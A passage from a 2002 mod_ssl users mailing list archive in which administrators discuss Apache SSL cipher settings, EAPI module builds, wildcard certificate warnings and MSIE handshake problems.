Y2F0aW9uL3gtaHR0cGQtbHhwIC5seHAK --_uReach_com_1804289383101466472415339xxx_-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Feb 25 23:57:25 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA07034; Mon, 25 Feb 2002 23:57:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id XAA06928; Mon, 25 Feb 2002 23:55:58 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16fU2H-0002SF-00 for modssl-users@modssl.org; Mon, 25 Feb 2002 23:55:57 +0100 To: modssl-users@modssl.org Subject: Re: Strong encryption Message-ID: <1014677757.3c7ac0fd79299@webmail.regiocom.net> Date: Mon, 25 Feb 2002 23:55:57 +0100 (CET) From: NickM References: <077AD8BDA52CD41197E900104B42A584EF8FB6@bnls230a.sni.co.uk> In-Reply-To: <077AD8BDA52CD41197E900104B42A584EF8FB6@bnls230a.sni.co.uk> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users One suggestion might be to drop the high security in apache and instead use a script to detect what encryption is requested then redirect as appropriate...possible even having the location redirected too using apache strong detect as a second measure. Nick Quoting "Bray, Mike" : > Hi > > We are using strong encryption with Apache (1.3.19) mod_ssl (2.8.5), > openssl > (0.9.5). We have the SSLCipher set to HIGH:+MEDIUM > > This rejects weak browsers, i.e. less than 128 bit encryption but it > does it > with a 'PAGE CAN NOT BE DISPLAYED'. I have looked at the logs and > have > found the error in client hello (no ciphers to share) but nothing goes > into > the Apache access logs. > > What we want to do is display a more friendly page helping the user > upgrade > their browser. Can you recommend any way to catch this error and output > an > error page. > > Regards > Mike Bray ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 09:43:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA03228; Tue, 26 Feb 2002 09:42:55 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mag06.bb.admin.ch id JAA03175; Tue, 26 Feb 2002 09:41:59 +0100 (MET) From: Michael.Straessle@bk.admin.ch Received: from mar02.bb.admin.ch (mar02.bb.admin.ch [193.5.222.72]) by mag06.bb.admin.ch (8.11.2/8.11.2) with ESMTP id g1Q8fwE01066 for ; Tue, 26 Feb 2002 09:41:58 +0100 (MET) Received: from mas22.bb.admin.ch (mas22.bb.admin.ch [193.5.222.83]) by mar02.bb.admin.ch (8.11.2/8.11.2) with SMTP id g1Q8frQ04903 for ; Tue, 26 Feb 2002 09:41:53 +0100 (MET) Received: by ad01008exc.ad.admin.ch with Internet Mail Service (5.5.2653.19) id ; Tue, 26 Feb 2002 09:41:53 +0100 Message-ID: To: modssl-users@modssl.org Subject: RE: How to install mod_ssl + mod_webapp? Date: Tue, 26 Feb 2002 09:41:51 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Michael.Straessle@bk.admin.ch X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users i did compile a post-1.1.2 EAPI version of mod_jserv which works fine - and without warnings - with my configuration (apache 1.3.22/mod_ssl 2.8.5): http://www.modssl.org/contrib/mod_jserv-1.1.3-dev-eapi-WIN32.zip ...had to set KeepAlive Off in httpd.conf however (BUG #569) to get production quality. michael > -----Ursprungliche Nachricht----- > Von: Will Guaraldi [mailto:wguaraldi@byallaccounts.com] > Gesendet: Freitag, 22. Februar 2002 15:36 > An: modssl-users@modssl.org > Betreff: RE: How to install mod_ssl + mod_webapp? > > > For the record, we're running Apache 1.3.20/mod_ssl 2.8.4 > with ApacheJServer > 1.1.2 and we get the same warning when it loads JServ that > you get with > mod_webapp.c and our application works fine. So you might not have to > recompile the mod_webapp module with -DEAPI. > > /will > > > -----Original Message----- > > From: owner-modssl-users@modssl.org > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Wes Barris > > Sent: Thursday, February 21, 2002 5:21 PM > > To: modssl list > > Subject: How to install mod_ssl + mod_webapp? > > > > > > We are currently using Jakarta-tomcat-4.0.1 with Apache httpd 1.3.22 > > (binary distributions for linux downloaded from the www.apache.org > > website). I also have mod_webapp installed (downloaded from the > > same website). > > > > Now, I want to add mod_ssl functionality to this mix. From what I > > gather from the www.modssl.org website, I must throw away what I > > have and compile from sources in order to use mod_ssl. > > > > I followed the instructions on this page: > > > > http://www.modssl.org/example/ > > > > and everything seemed to build properly. After copying > mod_ssl.so to > > the new ./libexec directory and adding the following two lines to > > ./conf/httpd.conf: > > > > LoadModule webapp_module libexec/mod_webapp.so > > AddModule mod_webapp.c > > > > I get this error message: > > > > root@redhat# /usr/local/apache-ssl/bin/apachectl configtest > > [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO > > libexec/mod_webapp.so uses plain Apache 1.3 API, this module > > might crash under EAPI! (please recompile it with -DEAPI) > > [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already > > added, skipping > > Syntax OK > > > > I can read the words but I don't really know what to do. It seems > > to be saying that I have to compile mod_webapp using -DEAPI. Can > > anyone provide some guidance? > > > > -- > > Wes Barris > > E-Mail: Wes.Barris@csiro.au > > Phone: 07-3346-2504 > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 09:55:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA04422; Tue, 26 Feb 2002 09:55:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id JAA04285; Tue, 26 Feb 2002 09:53:47 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id JAA03076 for modssl-users@modssl.org; Tue, 26 Feb 2002 09:53:44 +0100 Date: Tue, 26 Feb 2002 09:53:44 +0100 From: "Matus \"fantomas\" Uhlar" To: modssl-users@modssl.org Subject: wildcard certificate errors? Message-ID: <20020226095344.A3043@fantomas.sk> Mail-Followup-To: modssl-users@modssl.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matus \"fantomas\" Uhlar" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA server certificate CommonName (CN) *.fantomas.sk' does NOT match server name!? I really don't understand this. *.fantomas.sk DOES match ssl.fantomas.sk, right? It works but why does it produce warning? -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. Save the whales. Collect the whole set. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 11:55:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14341; Tue, 26 Feb 2002 11:55:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA14174; Tue, 26 Feb 2002 11:53:16 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 4BD5F4CE674; Tue, 26 Feb 2002 11:53:14 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1QAqvF51653; Tue, 26 Feb 2002 11:52:57 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.allcash.de id LAA10277; Tue, 26 Feb 2002 11:02:49 +0100 (MET) Received: from srvall18.allcash.de (srvall18.intern.allcash.de [192.168.85.19]) by mail.allcash.de (8.11.0/8.11.0/SuSE Linux 8.11.0-0.4) with ESMTP id g1QA2gt32173 for ; Tue, 26 Feb 2002 11:02:42 +0100 X-Authentication-Warning: mail.allcash.de: Host srvall18.intern.allcash.de [192.168.85.19] claimed to be srvall18.allcash.de Received: by srvall18.intern.allcash.de with Internet Mail Service (5.5.2655.55) id ; Tue, 26 Feb 2002 11:09:53 +0100 Message-ID: <770FEC75F301D611B59B00902777E56A1145D0@srvall18.intern.allcash.de> From: "Nisbach, Thomas" To: "'modssl-users@modssl.org'" Subject: SSL-Problem with Mac MSIE Date: Tue, 26 Feb 2002 11:09:48 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2655.55) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Nisbach, Thomas" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, i am using a self-signed (but valid) certificate with 'Server: Apache/1.3.14, Interface: mod_ssl/2.7.1, Library: OpenSSL/0.9.6' and the workarounds for MSIE in the http.conf: SetEnvIf User-Agent ".*MSIE.*" \ nokeepalive ssl-unclean-shutdown \ downgrade-1.0 force-response-1.0 Allowed ciphers: SSLCipherSuite ALL:!ADH:!EXP56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL But there is still a problem when trying to connect with MSIE 5.13 on Macintosh (compatible; MSIE 5.13; Mac_PowerPC). Here's my SSL-Log: [info] Connection to child 0 established (server x.x.x:443, client x.x.x.x) [info] Seeding PRNG with 1160 bytes of entropy [error] SSL handshake interrupted by system [Hint: Stop button pressed in browser?!] (System error follows) [error] System: Connection reset by peer (errno: 104) Becaus MSIE 5.13 is the latest MSIE on Mac i need a solution/workaround for this problem. Any ideas? Thomas ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 11:57:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14384; Tue, 26 Feb 2002 11:55:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id LAA14176; Tue, 26 Feb 2002 11:53:17 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 3E4EA4CE620; Tue, 26 Feb 2002 11:53:14 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1QAqsh51647; Tue, 26 Feb 2002 11:52:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id KAA08477; Tue, 26 Feb 2002 10:41:18 +0100 (MET) Date: Tue, 26 Feb 2002 10:41:18 +0100 (MET) Message-Id: <200202260941.KAA08477@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] SSL config w 1.3.23/2.8.6/0.9.6c +php4.1.1 (PR#666) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: Amael Version: mod_ssl-2.8.6-1.3.23 OS: FreeBSD 4.5 Submission from: (NULL) (194.237.142.7) I have problems creating a SSL vhost. I cant define SSL "options" ie SSLEngine etc outside part of the httpd.conf. If i do, i get this error message: Invalid command 'SSLEngine', perhaps mis-spelled or defined by a module not included in the server configuration But if i check the ssl_engine.log modssl and openssl seems to be with me: [26/Feb/2002 09:03:48 20479] [info] Server: Apache/1.3.23, Interface: mod_ssl/2.8.6, Library: OpenSSL/0.9.6c [Tue Feb 26 09:03:53 2002] [notice] Apache/1.3.23 (Unix) PHP/4.1.1 mod_ssl/2.8.6 OpenSSL/0.9.6c configured -- resuming normal operations So currently i have a *:80 vhost defined, a _default_:443 defined within the part and two vhost with the same ip, one with port 80 and one with port 443 outside the ifdefine part. When i try to access the https part this shows up in the errorlog [Tue Feb 26 10:20:53 2002] [error] [client 192.168.0.13] Invalid method in request \x80L^A^C^A And access.log - [26/Feb/2002:10:20:53 +0100] "€L" 501 - So i change the _default_:443 vhost to myip:443. Now i get a completly different messages in the logs: [ssl_engine.log] [26/Feb/2002 10:26:32 20646] [trace] OpenSSL: Handshake: done [26/Feb/2002 10:26:32 20646] [info] Connection: Client IP: myip, Protocol: TLSv1, Cipher: RC4-MD5 (128/128 bits) .. [26/Feb/2002 10:26:32 20646] [trace] OpenSSL: Write: SSL negotiation finished successfully [26/Feb/2002 10:26:32 20646] [info] Connection to child 2 closed with standard shutdown (server myservername:443, client myip) So it seems that the handshake part went ok, but no page is displayed, only a "The page cannot be displayed" error page (Cannot find server or DNS Error). I have tried with both IE 5.x and IE6. If i type ../bin/httpd -L i cant see any SSL directives in the list, and with ../bin/httpd -S i cant see the vhost defined within the part. The config file has both a 'LoadModule ssl_module libexec/libssl.so' and 'AddModule mod_ssl.c' defined. Whats the problem? Btw, i couldnt use my old httpd.conf, it seems to have the same problems, but httpd.conf changed so much i didn´t dare to use it, so i wrote a new one. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 14:20:36 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA00666; Tue, 26 Feb 2002 14:19:00 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id OAA00581; Tue, 26 Feb 2002 14:17:31 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 5B3B97E48; Tue, 26 Feb 2002 08:18:37 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 59F153EB1 for ; Tue, 26 Feb 2002 08:18:37 -0500 (EST) Date: Tue, 26 Feb 2002 08:18:37 -0500 (EST) From: "Julian C. Dunn" To: modssl-users@modssl.org Subject: Re: wildcard certificate errors? In-Reply-To: <20020226095344.A3043@fantomas.sk> Message-ID: <20020226081721.Y41521-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, 26 Feb 2002, Matus "fantomas" Uhlar wrote: > [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA > server certificate CommonName (CN) *.fantomas.sk' does NOT match server > name!? > > I really don't understand this. *.fantomas.sk DOES match ssl.fantomas.sk, > right? It works but why does it produce warning? No, it doesn't, because there are no wildcard expansion patterns accepted on the server end. Wildcard certs only work because the _browser_ accepts the wildcard in the CN. In any case the warning you are seeing is only a warning; it's not fatal. - Julian -- Julian C. Dunn, B.A.Sc Senior Software Developer, VerticalScope Inc. Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 WWW: www.verticalscope.com "Windows NT encountered the following error: The operation was completed successfully." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 14:33:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA02113; Tue, 26 Feb 2002 14:32:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from CGATE_EXCH.wtd.com id OAA02050; Tue, 26 Feb 2002 14:31:55 +0100 (MET) Received: from CGATE_EXCH.wtd.com (unverified) by CGATE_EXCH.wtd.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Tue, 26 Feb 2002 13:26:22 +0000 Received: by CGATE_EXCH with Internet Mail Service (5.5.2653.19) id <1K5MYV41>; Tue, 26 Feb 2002 13:26:21 -0000 Message-ID: From: Rhys Hopkins To: "'modssl-users@modssl.org'" Subject: RE: wildcard certificate errors? Date: Tue, 26 Feb 2002 13:26:19 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rhys Hopkins X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have this problem viewing our site with IE5.5 Do all microsoft browsers reject wildcard certs ? Is there a patch for IE5 to get round this problem ? Why don't Thawte tell you about this when you buy the certificate? Rhys. -----Original Message----- From: Julian C. Dunn [mailto:jdunn@verticalscope.com] Sent: 26 February 2002 13:19 To: modssl-users@modssl.org Subject: Re: wildcard certificate errors? On Tue, 26 Feb 2002, Matus "fantomas" Uhlar wrote: > [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA > server certificate CommonName (CN) *.fantomas.sk' does NOT match server > name!? > > I really don't understand this. *.fantomas.sk DOES match ssl.fantomas.sk, > right? It works but why does it produce warning? No, it doesn't, because there are no wildcard expansion patterns accepted on the server end. Wildcard certs only work because the _browser_ accepts the wildcard in the CN. In any case the warning you are seeing is only a warning; it's not fatal. - Julian -- Julian C. Dunn, B.A.Sc Senior Software Developer, VerticalScope Inc. Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 WWW: www.verticalscope.com "Windows NT encountered the following error: The operation was completed successfully." ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 14:51:34 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA03784; Tue, 26 Feb 2002 14:49:52 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id OAA03671; Tue, 26 Feb 2002 14:48:38 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g1QDmDv19708 for ; Tue, 26 Feb 2002 13:48:18 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Tue, 26 Feb 2002 13:48:07 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066DE8@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: wildcard certificate errors? Date: Tue, 26 Feb 2002 13:48:07 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users >-----Original Message----- >From: Rhys Hopkins [mailto:rhys.hopkins@aerotech-eu.com] >Sent: 26 February 2002 13:26 >To: 'modssl-users@modssl.org' >Subject: RE: wildcard certificate errors? > > >I have this problem viewing our site with IE5.5 >Do all microsoft browsers reject wildcard certs ? Some reject them entirely, eg IE3, but these are no longer supported. I trust that you mean IE5.5SP2? >Is there a patch for IE5 to get round this problem ? You should be able to either disable the warning or click past it. > >Why don't Thawte tell you about this when you buy the certificate? > The information is there on their site: http://www.thawte.com/getinfo/products/wildcard/overview.html I found this clicking the wildcard certificates link from www.thawte.com. Not exactly hidden. There's even a link to creating test certificates that you can play with until you get the process right. Officialy IE doesn't support wildcard certificates, but other than the original IE5 refusing them unofficially it does. In fact, there were enormous bugs with IE5 (pre version 5.01). - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Julian C. Dunn [mailto:jdunn@verticalscope.com] >Sent: 26 February 2002 13:19 >To: modssl-users@modssl.org >Subject: Re: wildcard certificate errors? > > >On Tue, 26 Feb 2002, Matus "fantomas" Uhlar wrote: > >> [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA >> server certificate CommonName (CN) *.fantomas.sk' does NOT >match server >> name!? >> >> I really don't understand this. *.fantomas.sk DOES match >ssl.fantomas.sk, >> right? It works but why does it produce warning? > >No, it doesn't, because there are no wildcard expansion >patterns accepted >on the server end. Wildcard certs only work because the >_browser_ accepts >the wildcard in the CN. > >In any case the warning you are seeing is only a warning; it's >not fatal. > >- Julian > >-- >Julian C. Dunn, B.A.Sc >Senior Software Developer, VerticalScope Inc. >Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 >WWW: www.verticalscope.com > >"Windows NT encountered the following error: >The operation was completed successfully." > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 15:21:48 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA06752; Tue, 26 Feb 2002 15:20:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from CGATE_EXCH.wtd.com id PAA06583; Tue, 26 Feb 2002 15:19:10 +0100 (MET) Received: from CGATE_EXCH.wtd.com (unverified) by CGATE_EXCH.wtd.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Tue, 26 Feb 2002 14:00:29 +0000 Received: by CGATE_EXCH with Internet Mail Service (5.5.2653.19) id <1K5MYVZJ>; Tue, 26 Feb 2002 14:00:29 -0000 Message-ID: From: Rhys Hopkins To: "'modssl-users@modssl.org'" Subject: RE: wildcard certificate errors? Date: Tue, 26 Feb 2002 14:00:22 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Rhys Hopkins X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks - My own fault for not reading things properly. Darn infuriating though - considering xx% of users have IE. -----Original Message----- From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk] Sent: 26 February 2002 13:48 To: modssl-users@modssl.org Subject: RE: wildcard certificate errors? >-----Original Message----- >From: Rhys Hopkins [mailto:rhys.hopkins@aerotech-eu.com] >Sent: 26 February 2002 13:26 >To: 'modssl-users@modssl.org' >Subject: RE: wildcard certificate errors? > > >I have this problem viewing our site with IE5.5 >Do all microsoft browsers reject wildcard certs ? Some reject them entirely, eg IE3, but these are no longer supported. I trust that you mean IE5.5SP2? >Is there a patch for IE5 to get round this problem ? You should be able to either disable the warning or click past it. > >Why don't Thawte tell you about this when you buy the certificate? > The information is there on their site: http://www.thawte.com/getinfo/products/wildcard/overview.html I found this clicking the wildcard certificates link from www.thawte.com. Not exactly hidden. There's even a link to creating test certificates that you can play with until you get the process right. Officialy IE doesn't support wildcard certificates, but other than the original IE5 refusing them unofficially it does. In fact, there were enormous bugs with IE5 (pre version 5.01). - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Julian C. Dunn [mailto:jdunn@verticalscope.com] >Sent: 26 February 2002 13:19 >To: modssl-users@modssl.org >Subject: Re: wildcard certificate errors? > > >On Tue, 26 Feb 2002, Matus "fantomas" Uhlar wrote: > >> [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA >> server certificate CommonName (CN) *.fantomas.sk' does NOT >match server >> name!? >> >> I really don't understand this. *.fantomas.sk DOES match >ssl.fantomas.sk, >> right? It works but why does it produce warning? > >No, it doesn't, because there are no wildcard expansion >patterns accepted >on the server end. Wildcard certs only work because the >_browser_ accepts >the wildcard in the CN. > >In any case the warning you are seeing is only a warning; it's >not fatal. > >- Julian > >-- >Julian C. Dunn, B.A.Sc >Senior Software Developer, VerticalScope Inc. >Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 >WWW: www.verticalscope.com > >"Windows NT encountered the following error: >The operation was completed successfully." > > >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 15:58:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA10077; Tue, 26 Feb 2002 15:57:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id PAA10054; Tue, 26 Feb 2002 15:57:17 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g1QEuwv23620 for ; Tue, 26 Feb 2002 14:57:03 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Tue, 26 Feb 2002 14:56:55 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066DEA@pborolocal.rnib.org.uk> To: modssl-users@modssl.org Subject: RE: wildcard certificate errors? Date: Tue, 26 Feb 2002 14:56:54 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users The most infuriating thing is that too many people use IE (including myself)! IE breaks so many standards it's incredible. The recent fiasco over handling a file according to its Mime-Type rather than its contents comes to mind. Faking extensions or Mime-Types is trivial, whereas faking contents isn't. This is precisely why most of the posts to this list seem to involve IE more than mod_ssl. Dismounts soapbox. John >-----Original Message----- >From: Rhys Hopkins [mailto:rhys.hopkins@aerotech-eu.com] >Sent: 26 February 2002 14:00 >To: 'modssl-users@modssl.org' >Subject: RE: wildcard certificate errors? > > >Thanks - My own fault for not reading things properly. >Darn infuriating though - considering xx% of users have IE. > >-----Original Message----- >From: John.Airey@rnib.org.uk [mailto:John.Airey@rnib.org.uk] >Sent: 26 February 2002 13:48 >To: modssl-users@modssl.org 